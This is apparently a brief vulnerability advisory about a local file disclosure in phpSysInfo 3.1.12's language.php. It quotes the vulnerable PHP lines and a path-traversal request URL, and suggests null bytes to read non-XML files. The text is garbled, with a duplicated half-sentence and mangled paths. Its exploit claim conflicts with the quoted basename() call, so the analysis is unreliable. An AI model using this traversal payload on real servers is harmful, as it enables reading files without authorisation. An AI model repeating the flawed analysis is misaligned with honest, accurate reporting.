PHPSYSINFO 3.1.12 Local File Disclosure

Written by khalil on . Posted in Vulnerabilities

In appsphpsysinfo3.1.12/language/language.php


60: echo file_get_contents(APP_ROOT . '/language/' . $lang . '.xml');

is presented where $lang is de In appsphpsysinfo3.1.12/language/language.php


60: echo file_get_contents(APP_ROOT . '/language/' . $lang . '.xml');

is presented where $lang is defined as:

52: $lang = basename($_GET['lang']);

Which can be exploited like

localhost/phpsysinfo/language/language.php?lang=../../../stufftoinclude

which can be extended with nullbytes to contain any other file that isn't
XML too.

Print